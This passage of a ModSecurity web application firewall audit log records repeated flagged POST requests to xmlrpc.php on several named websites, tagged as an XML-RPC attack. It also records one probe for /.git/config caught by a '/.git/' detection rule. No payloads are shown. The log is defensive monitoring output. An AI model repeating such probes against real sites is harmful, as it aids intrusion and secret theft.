p1=352, p2=1568, p3=72, p4=52, p5=169, sr=104, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d091a138-Z-- --d47bdd56-A-- [15/Jun/2025:22:40:06.309180 +0530] aE7-bUmAj8yxyFrMChhyDQAAAAE 128.199.112.101 41056 127.0.0.1 7081 --d47bdd56-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d47bdd56-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d47bdd56-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7-bUmAj8yxyFrMChhyDQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007405367201 942035 (- - -) Stopwatch2: 1750007405367201 942035; combined=1983, p1=327, p2=1248, p3=46, p4=68, p5=181, sr=86, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d47bdd56-Z-- --a8df3369-A-- [15/Jun/2025:22:40:44.922498 +0530] aE7-lEmAj8yxyFrMChhyIQAAAAE 183.56.195.106 53262 127.0.0.1 7081 --a8df3369-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --a8df3369-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --a8df3369-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7-lEmAj8yxyFrMChhyIQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007444638234 284326 (- - -) Stopwatch2: 1750007444638234 284326; combined=2085, p1=373, p2=1380, p3=58, p4=33, p5=154, sr=108, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a8df3369-Z-- --a28ac809-A-- [15/Jun/2025:22:41:00.437062 +0530] aE7-pIw8YNvdo5WL3nerlAAAAAc 124.109.12.110 46042 127.0.0.1 7081 --a28ac809-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a28ac809-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --a28ac809-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7-pIw8YNvdo5WL3nerlAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007460128236 308888 (- - -) Stopwatch2: 1750007460128236 308888; combined=2565, p1=404, p2=1668, p3=109, p4=66, p5=194, sr=125, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a28ac809-Z-- --995ace4d-A-- [15/Jun/2025:22:41:01.536820 +0530] aE7-pGCPauOs0aEe3c09WQAAAAI 34.139.48.54 46056 127.0.0.1 7081 --995ace4d-B-- GET /.git/config HTTP/1.0 Host: www.retaxis.com X-Real-IP: 34.139.48.54 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --995ace4d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=cba7b0006a2481eebc5efcd6e94fd28a1750007461; expires=Sun, 15 Jun 2025 18:11:01 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --995ace4d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.git/config"] [unique_id "aE7-pGCPauOs0aEe3c09WQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007460371069 1165822 (- - -) Stopwatch2: 1750007460371069 1165822; combined=1641, p1=397, p2=1156, p3=0, p4=0, p5=87, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --995ace4d-Z-- --4dde8a74-A-- [15/Jun/2025:22:41:06.325039 +0530] aE7-qfVluSm0zKldlXc25wAAAAA 128.199.112.101 46224 127.0.0.1 7081 --4dde8a74-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4dde8a74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4dde8a74-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7-qfVluSm0zKldlXc25wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007465394713 930391 (- - -) Stopwatch2: 1750007465394713 930391; combined=2491, p1=395, p2=1677, p3=45, p4=64, p5=189, sr=114, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4dde8a74-Z-- --1af46275-A-- [15/Jun/2025:22:41:45.278986 +0530] aE7-0JK-05zbifgH_rQKmwAAAAU 183.56.195.106 55844 127.0.0.1 7081 --1af46275-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --1af46275-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --1af46275-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (48+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (48+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7-0JK-05zbifgH_rQKmwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007504995328 283727 (- - -) Stopwatch2: 1750007504995328 283727; combined=2188, p1=354, p2=1523, p3=56, p4=29, p5=141, sr=97, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1af46275-Z-- --2848db71-A-- [15/Jun/2025:22:42:06.837613 +0530] aE7-5d40YvvHR2Fi0mNLfQAAAAk 128.199.112.101 57544 127.0.0.1 7081 --2848db71-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2848db71-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2848db71-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7-5d40YvvHR2Fi0mNLfQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007525881950 955723 (- - -) Stopwatch2: 1750007525881950 955723; combined=2281, p1=353, p2=1552, p3=35, p4=50, p5=176, sr=96, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2848db71-Z-- --4718c51d-A-- [15/Jun/2025:22:42:44.545012 +0530] aE7_DIw8YNvdo5WL3ner1gAAAAc 183.56.195.106 46900 127.0.0.1 7081 --4718c51d-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --4718c51d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --4718c51d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (34+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (34+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7_DIw8YNvdo5WL3ner1gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007564259455 285633 (- - -) Stopwatch2: 1750007564259455 285633; combined=2285, p1=356, p2=1522, p3=72, p4=42, p5=186, sr=96, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4718c51d-Z-- --67adec4f-A-- [15/Jun/2025:22:42:51.763988 +0530] aE7_E2CPauOs0aEe3c09ogAAAAI 124.109.12.110 54558 127.0.0.1 7081 --67adec4f-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --67adec4f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --67adec4f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7_E2CPauOs0aEe3c09ogAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007571454312 309738 (- - -) Stopwatch2: 1750007571454312 309738; combined=2231, p1=339, p2=1511, p3=61, p4=47, p5=170, sr=88, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --67adec4f-Z-- --c3beda77-A-- [15/Jun/2025:22:43:06.222802 +0530] aE7_IZK-05zbifgH_rQKwgAAAAU 128.199.112.101 56434 127.0.0.1 7081 --c3beda77-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --c3beda77-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c3beda77-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7_IZK-05zbifgH_rQKwgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007585279808 943048 (- - -) Stopwatch2: 1750007585279808 943048; combined=2341, p1=426, p2=1282, p3=42, p4=64, p5=294, sr=97, sw=233, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3beda77-Z-- --5524b812-A-- [15/Jun/2025:22:43:46.019759 +0530] aE7_SYw8YNvdo5WL3ner8wAAAAc 183.56.195.106 34608 127.0.0.1 7081 --5524b812-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --5524b812-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --5524b812-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7_SYw8YNvdo5WL3ner8wAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007625726943 292880 (- - -) Stopwatch2: 1750007625726943 292880; combined=2232, p1=374, p2=1473, p3=81, p4=39, p5=166, sr=104, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5524b812-Z-- --92a0d065-A-- [15/Jun/2025:22:43:51.772409 +0530] aE7_TwZ37L8e68IeSGntNQAAAAo 124.109.12.110 43560 127.0.0.1 7081 --92a0d065-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --92a0d065-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --92a0d065-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7_TwZ37L8e68IeSGntNQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007631445941 326567 (- - -) Stopwatch2: 1750007631445941 326567; combined=2531, p1=369, p2=1705, p3=83, p4=59, p5=197, sr=106, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92a0d065-Z-- --cd61ed27-A-- [15/Jun/2025:22:44:06.782006 +0530] aE7_Xd40YvvHR2Fi0mNLvgAAAAk 128.199.112.101 32790 127.0.0.1 7081 --cd61ed27-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --cd61ed27-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cd61ed27-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7_Xd40YvvHR2Fi0mNLvgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007645641639 1140441 (- - -) Stopwatch2: 1750007645641639 1140441; combined=2265, p1=412, p2=1388, p3=48, p4=82, p5=213, sr=114, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd61ed27-Z-- --d48a1c39-A-- [15/Jun/2025:22:44:46.379005 +0530] aE7_hvVluSm0zKldlXc3cQAAAAA 183.56.195.106 38646 127.0.0.1 7081 --d48a1c39-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --d48a1c39-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --d48a1c39-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] 